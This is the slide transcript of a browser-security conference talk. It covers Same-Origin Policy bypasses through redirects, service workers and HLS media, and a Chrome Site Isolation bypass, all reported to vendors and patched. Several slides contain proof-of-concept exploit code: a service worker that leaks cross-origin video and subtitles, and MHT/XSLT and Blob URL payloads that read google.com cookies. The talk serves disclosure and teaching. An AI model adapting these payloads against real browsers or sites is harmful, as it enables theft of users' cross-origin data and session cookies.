Logically Bypassing Browser Security Boundaries

Transcript

1. Logically Bypassing Browser Security Boundaries

2. > self.toString() < “Jun Kokatsu (@shhnjk)” < “Browser Vulnerability Research

   Team at Microsoft” < “Chrome VRP participant” < “Japanese Manga addict”

3. > self.toString() < “Jun Kokatsu (@shhnjk)” < “Browser Vulnerability Research

   Team at Microsoft” < “Chrome VRP participant” < “Japanese Manga addict”

4. Agenda 1. What is Same-Origin Policy? 2. Simple concept of

   SOP bypass 3. Apply concept to find bugs 4. What is Site Isolation? 5. Site Isolation bypass 6. Wrap up

5. Same-Origin Policy Scheme + Host + Port = Origin https://www.example.com:443

6. Scope of SOP • Evil.com shouldn’t be able to access

   resources loaded from Example.com • Same-Origin Policy is applied everywhere in a webpage

7. Simple concept of SOP bypass • The core concept of

   SOP is to compare given URLs • Does URL always reflect the right origin? • Is there any way to confuse browser?

8. 1. iframe/CSP sandbox iframe/CSP sandbox is a way to treat

   specific contents as being from a unique origin <iframe src=“https://www.example.com/untrusted.html” sandbox=“allow-scripts”></iframe> OR Content-Security-Policy: sandbox allow-scripts; location.href // “https://www.example.com/untrusted.html” self.origin // “null”

9. Use case of CSP sandbox https://www.Dropbox.com/enterprise • Dropbox uses CMS

   in “/enterprise” • CSP sandbox mitigates exploitability of XSS in third-party CMS contents Devdatta Akhawe: How I learnt to play in the (CSP) Sandbox https://youtu.be/fbhW37JZtSA

10. Stealing password from sandbox • Every browser has a built-in

    password manager • Most of browsers only checked the origin based on URL Resulted in auto-filling a password saved in main content to sandboxed content. Affected: iOS only

11. 2. Time-of-check Time-of-use • Web page can load sub-resources from

    other site • We need a Magic to swap a sub-resource after security checks

12. Magic1: HTTP Redirect Status: 302 Location: https://example.com/secret.jpg

13. Stealing cross-origin audio data Web Audio API allows access to

    audio data loaded in <audio> or <video> • Chrome only did security check against initial URL of media resource

14. Stealing cross-origin audio data Web Audio API allows access to

    audio data loaded in <audio> or <video> • Chrome only did security check against initial URL of media resource • Webkit didn’t have a security check of audio data access

15. Stealing cross-origin audio data Web Audio API allows access to

    audio data loaded in <audio> or <video> • Chrome only did security check against initial URL of media resource • Webkit didn’t have a security check of audio data access Resulted in leaking audio data of cross-origin audio/video Affected: $2000

16. Magic2: Service Worker • Service Worker is a script that

    gets registered and runs in the background • It has an ability to intercept requests within its scope and respond to it <script> navigator.serviceWorker.register(“https://www.example.com/Service_Worker.js”); // Scope: https://www.example.com/ </script> // https://www.example.com/Service_Worker.js if(event.request.url == “https://www.example.com/”){ event.respondWith( fetch(“https://www.example.com/landing_page.html”) ); }

17. Magic2: Service Worker Service worker can respond with cross-origin resource

    in two cases 1. If a cross-origin resource allows access with CORS 2. If the request’s destination supports “no-cors” request // https://evil.com/Service_Worker.js event.respondWith( fetch(“https://example.com/”) ); // Access-Control-Allow-Origin: * // https://evil.com/Service_Worker.js event.respondWith( fetch(“https://example.com/”, {mode: “no-cors”}) );
18. None

19. Stealing multiple sub-resources Chrome missed to check tainted response in

    many components Resulted in leaking cross-origin information such as: • Audio through Web Audio API (patch bypass )

20. Stealing multiple sub-resources Chrome missed to check tainted response in

    many components Resulted in leaking cross-origin information such as: • Audio through Web Audio API (patch bypass ) • Audio and video through captureStream method

21. Stealing multiple sub-resources Chrome missed to check tainted response in

    many components Resulted in leaking cross-origin information such as: • Audio through Web Audio API (patch bypass ) • Audio and video through captureStream method • Content of WebVTT file

22. Stealing multiple sub-resources Chrome missed to check tainted response in

    many components Resulted in leaking cross-origin information such as: • Audio through Web Audio API (patch bypass ) • Audio and video through captureStream method • Content of WebVTT file • Content of CSS file

23. Stealing multiple sub-resources Chrome missed to check tainted response in

    many components Resulted in leaking cross-origin information such as: • Audio through Web Audio API (patch bypass ) • Audio and video through captureStream method • Content of WebVTT file • Content of CSS file • Response size of arbitrary resource

24. Stealing multiple sub-resources Chrome missed to check tainted response in

    many components Resulted in leaking cross-origin information such as: • Audio through Web Audio API (patch bypass ) • Audio and video through captureStream method • Content of WebVTT file • Content of CSS file • Response size of arbitrary resource Affected: $8000

25. <video id="leftVideo" style="visibility:hidden" autoplay controls muted><source id="src" type="video/mp4"></video> <video id="result"

    controls autoplay><track src="/vtt" onload="go()" kind="subtitles" srclang="en" label="English" id="entrack" /></video> <script> navigator.serviceWorker.register('/video_poc.js').then( () => { setTimeout( () => {document.getElementById('leftVideo').src="/video";}, 500); });}); var leftVideo = document.getElementById('leftVideo'); var stream; var mediaRecorder; chunks = []; function maybeCreateStream() { if (stream) { return; } stream = leftVideo.captureStream(); mediaRecorder = new MediaRecorder(stream); mediaRecorder.start(); mediaRecorder.ondataavailable = e => { chunks.push(e.data); function blobToDataURL(callback) { var reader = new FileReader(); reader.onload = e => {callback(e.target.result);} reader.readAsDataURL(chunks[0]); } blobToDataURL(dataurl => { document.getElementById('result').src = dataurl; }); }; } leftVideo.oncanplay = maybeCreateStream; if (leftVideo.readyState >= 3) { maybeCreateStream(); } </script>

26. // video_poc.js onfetch = e => { if(e.request.url.endsWith("video")){ e.respondWith(fetch("https://storage.cloud.google.com/shhnjk/roll%20safe.mp4",{mode: "no-cors",

    credentials: "include"})); }else if(e.request.url.endsWith("vtt")){ e.respondWith(fetch("https://storage.cloud.google.com/shhnjk/secret.vtt",{mode: "no-cors", credentials: "include"})); } } // WebVTT stealing part function go(){ var myTrack = document.getElementById("entrack").track; var myCues = myTrack.cues; for (var i = 0; i < myCues.length; i++) { document.body.innerHTML += "VTT content: "+myCues[i].getCueAsHTML().textContent + "<br/>"; } }

27. Magic3: Weird file format (HLS) HTTP Live Streaming is a

    playlist-based video file made by Apple

28. Magic3: Weird file format (HLS) HTTP Live Streaming is a

    playlist-based video file made by Apple main.m3u8 video.m3u8 Actual video file audio.m3u8 Actual audio file <video controls> <source src="/main.m3u8"> </video>

29. Magic3: Weird file format (HLS)

30. Stealing audio and video again • Chrome uses Android’s media

    player for HLS and leaked video

31. Stealing audio and video again • Chrome uses Android’s media

    player for HLS and leaked video • Firefox uses third-party player for HLS and leaked audio

32. Stealing audio and video again • Chrome uses Android’s media

    player for HLS and leaked video • Firefox uses third-party player for HLS and leaked audio • Webkit has native HLS implementation, yet leaked video.

33. Stealing audio and video again • Chrome uses Android’s media

    player for HLS and leaked video • Firefox uses third-party player for HLS and leaked audio • Webkit has native HLS implementation, yet leaked video. Affected: $10000

34. What is Site Isolation? Site Isolation is a security feature

    in Chrome which mitigates Spectre, UXSS, etc, by strictly separating renderer process per Site Scheme + eTLD+1 = “Site” in Site Isolation https://www.example.com:443 https://www.chromium.org/developers/design-documents/site-isolation

35. UXSS should be alive! Tested Site Isolation with old UXSS

    in Chrome 61 https://github.com/Bo0oM/CVE-2017-5124 > document.domain

36. UXSS should be alive! Tested Site Isolation with old UXSS

    in Chrome 61 https://github.com/Bo0oM/CVE-2017-5124 > document.domain < “google.com”

37. UXSS should be alive! Tested Site Isolation with old UXSS

    in Chrome 61 https://github.com/Bo0oM/CVE-2017-5124 > document.domain < “google.com” > document.cookie

38. UXSS should be alive! Tested Site Isolation with old UXSS

    in Chrome 61 https://github.com/Bo0oM/CVE-2017-5124 > document.domain < “google.com” > document.cookie

39. Pinging a friend Me: Hey Masato, this is fun! We

    can’t get cookie with UXSS because of Site Isolation! 5 mins later…

40. Pinging a friend Me: Hey Masato, this is fun! We

    can’t get cookie with UXSS because of Site Isolation! 5 mins later… Masato: We can. Just need to create Blob URL and Blob URL can access it var text = `<iframe onload=alert(this.contentWindow.document.cookie) src=https://www.google.com/robots.txt></iframe>`; var blob = new Blob([text], {type : “text/html”}); var url = URL.createObjectURL(blob); location.href = url;

41. How should we make a PoC? CVE-2017-5124 was patched. We

    are left with 2 options. 1. Find new UXSS 2. Simulate renderer process compromise and replicate the same bug Finding UXSS isn’t easy. And… https://www.google.com/about/appsecurity/chrome-rewards/#special

42. Option 3? Me: Masato, you should just report the bug

    and let Chrome folks decide if the same bug still exists.

43. Option 3? Me: Masato, you should just report the bug

    and let Chrome folks decide if the same bug still exists. Masato: I feel bad about reporting a bug without knowing anything about Site Isolation… Me:

44. Option 4?

45. Wait, is UXSS dead? Asked @nasko if compromised renderer should

    be able to perform cross-site UXSS after Site Isolation

46. Wait, is UXSS dead? Asked @nasko if compromised renderer should

    be able to perform cross-site UXSS after Site Isolation

47. Wait, is UXSS dead? Asked @nasko if compromised renderer should

    be able to perform cross-site UXSS after Site Isolation

48. Understanding CVE-2017-5124 MIME-Version: 1.0 Content-Type: multipart/related; type="text/html";boundary="----MultipartBoundary--" ------MultipartBoundary-- Content-Type: application/xml

    <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://www.google.com <script>alert(document.cookie)</script> ------MultipartBoundary---- Browser process Renderer process 1 https://evil.com <iframe> https://www.google.com Process for “https://evil.com” Cookie for google.com please! Your process is for evil.com. Die! PoC.mht

49. Understanding SI bypass Cookie for google.com please! MIME-Version: 1.0 Content-Type:

    multipart/related; type="text/html";boundary="----MultipartBoundary--" ------MultipartBoundary-- Content-Type: application/xml; <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://www.google.com <script> var blob = new Blob([`<iframe onload=alert(this.contentWindow.document.cookie) src=https://www.google.com/robots.txt></iframe>`], {type : “text/html”}); location.href = URL.createObjectURL(blob); </script> ------MultipartBoundary---- Browser process Renderer process 1 https://evil.com <iframe> Process for “https://evil.com” Blob URL for google.com please! No problem https://www.google.com

50. Understanding SI bypass Cookie for google.com please! MIME-Version: 1.0 Content-Type:

    multipart/related; type="text/html";boundary="----MultipartBoundary--" ------MultipartBoundary-- Content-Type: application/xml; <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://www.google.com <script> var blob = new Blob([`<iframe onload=alert(this.contentWindow.document.cookie) src=https://www.google.com/robots.txt></iframe>`], {type : “text/html”}); location.href = URL.createObjectURL(blob); </script> ------MultipartBoundary---- Browser process Renderer process 2 blob:https://www.google.com <iframe> Process for “https://google.com” Cookie for google.com please! No problem https://www.google.com

51. But how? 1. Blob URL is created inside renderer process

52. But how? 1. Blob URL is created inside renderer process

    2. Browser process missed to check “Site” for process when verifying Blob URL created by renderer process

53. But how? 1. Blob URL is created inside renderer process

    2. Browser process missed to check “Site” for process when verifying Blob URL created by renderer process $8000

54. But how? 1. Blob URL is created inside renderer process

    2. Browser process missed to check “Site” for process when verifying Blob URL created by renderer process Live Demo! $8000

55. What Site Isolation protects? As of Chrome 70, Site Isolation

    protect against: 1. Spectre 2. UXSS (or maybe not?) But it doesn’t fully protect against renderer process compromise. Yet, it has some protections (e.g. UXSS, cookie access).

56. Wrap up 1. SOP bypass isn’t only about DOM access.

    Check sub-resource access too. 2. Site Isolation is an interesting and important protection. You should poke around.

57. Acknowledgements • SW origin confusion technique crbug.com/598077 • @i_bo0om for

    the UXSS in Chrome 61 (CVE-2017-5124) • @kinugawamasato, finder of Site Isolation bypass • @jaffathecake, jakearchibald.com/2018/i-discovered-a-browser-bug/ • Thanks Chrome Security team, Mozilla Security team, and Apple Product Security team! • Thanks Google VRP!!

58. Questions? Let me Bing it for you